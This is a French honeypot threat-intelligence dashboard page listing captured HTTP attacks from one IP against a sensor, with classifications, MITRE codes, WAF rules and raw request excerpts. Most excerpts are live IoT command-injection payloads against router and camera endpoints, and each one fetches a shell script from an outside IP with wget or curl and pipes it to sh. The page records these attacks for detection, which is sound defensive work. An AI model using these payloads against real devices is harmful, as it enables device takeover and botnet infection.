Profil de menace
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance 100 % — Score WAF 100 · 9 tag(s) WAF
ASN 197170 · 45.153.34.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 181 événements sur la période pour cette IP.
Même FAI TechTies Inc. — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
181 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
181 événement(s) — page 4/4
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /web/google_analytics.php | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /web/google_analytics.php
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/web/google_analytics.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/web/google_analytics.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /web/google_analytics.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length:
Requête brute (extrait)
POST /web/google_analytics.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 161 Connection: close arg=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdmc;busybox wget http://91.92.40.118/wget.sh |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /index.php | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /index.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/index.php
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
GET /index.php HTTP/1.1 Host: 62.3.50.33:8081 Cookie: username=admin%3B%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-
Requête brute (extrait)
GET /index.php HTTP/1.1 Host: 62.3.50.33:8081 Cookie: username=admin%3B%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20wdmc2%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20wdmc2%3Bcurl%20http://91.92.40.118/wget.sh%7 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/;cd | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/;cd
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/;cd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/;cd
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavl
Requête brute (extrait)
GET /cgi-bin/;cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;busybox wget http://91.92.40.118/wget.sh -O-|sh -s wavlink;curl http://91.92.40.118/wget.sh|sh -s wavlink HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /Security/auditLog/search | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /Security/auditLog/search
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Security/auditLog/search
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/Security/auditLog/search
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /Security/auditLog/search?logTime=0;`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s hik3;busybox wget http://91.92.40.11
Requête brute (extrait)
GET /Security/auditLog/search?logTime=0;`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s hik3;busybox wget http://91.92.40.118/wget.sh -O-|sh -s hik3;curl http://91.92.40.118/wget.sh|sh -s hik3` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/downloadFlile.cgi | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/downloadFlile.cgi
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/downloadFlile.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/downloadFlile.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/downloadFlile.cgi?name=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s toto5;busybox wget http://91.92.40.118/w
Requête brute (extrait)
GET /cgi-bin/downloadFlile.cgi?name=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s toto5;busybox wget http://91.92.40.118/wget.sh -O-|sh -s toto5;curl http://91.92.40.118/wget.sh|sh -s toto5` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/luci | Élevée | Moyen · 61 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/luci
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/luci
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/luci
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 61
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0144
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Probe /cgi-bin/luci
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
webshell-param-cmd
Payload (extrait)
GET /cgi-bin/luci?cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;busybox wget http://91.92.40.118/wget.sh -O-|sh
Requête brute (extrait)
GET /cgi-bin/luci?cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;busybox wget http://91.92.40.118/wget.sh -O-|sh -s tuoshi;curl http://91.92.40.118/wget.sh|sh -s tuoshi` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /rc/index.php | Élevée | Moyen · 63 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /rc/index.php
Émulateur
HTTP
WAF
21
Recommandation
Investiguer
Tags
Cible HTTP
GET
/rc/index.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/rc/index.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-14) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 63
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-14
rce-0
nosqli-3
Payload (extrait)
GET /rc/index.php?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;busybox wget http://91.92.40.118/wget.sh -O-|s
Requête brute (extrait)
GET /rc/index.php?param=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;busybox wget http://91.92.40.118/wget.sh -O-|sh -s mdomo;curl http://91.92.40.118/wget.sh|sh -s mdomo` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs…
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
Service
HTTP
Pourquoi cette classification : Paramètres de scan · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
webshell-param-cmd
Payload (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wge
Requête brute (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs HTTP/1.1 Host: 62.3.50.33:8081 Connection: clo |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /HNAP1/GetDeviceSettings/`cd | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /HNAP1/GetDeviceSettings/`cd
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/HNAP1/GetDeviceSettings/`cd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/HNAP1/GetDeviceSettings/`cd
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Probe /HNAP1/
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
GET /HNAP1/GetDeviceSettings/`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;busybox wget http://91.92.40.118/wget.sh
Requête brute (extrait)
GET /HNAP1/GetDeviceSettings/`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;busybox wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;curl http://91.92.40.118/wget.sh|sh -s dhnap2` HTTP/1.1 Host: 62.3.50.33:8081 SOAPAction: "http://purenetwor |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /login.cgi | Élevée | Moyen · 46 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
POST /login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
POST
/login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/login.cgi
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Correspondance tags WAF · Sonde fichier sensible / config · confiance 97%
Confiance classification
97%
Risque capteur
Moyen
· 46
Confiance : Confiance 97 % — 5 signal(aux) capteur
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection:
Requête brute (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /diagnostic.php | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /diagnostic.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/diagnostic.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/diagnostic.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Le
Requête brute (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 218 Connection: close act=ping&dst=%26%20cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusy |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%2…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel;
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20al…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge
Requête brute (extrait)
GET /cgi-bin/masterCGI?ping=nomip&user=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20alcatel; HTTP/1.1 Ho |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/firmware/Upgrade Content-Length: 251 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/firmware/Upgrade","com
|
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.
Requête brute (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo HTTP/1.1 Host: 62.3.50.3 |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lset…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.9
Requête brute (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup HTTP/1.1 Host: 62.3.50.33:808 |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
52
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 8 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json X-JNAP-ACTION: http://linksys.com/jnap/wpsstationin
Requête brute (extrait)
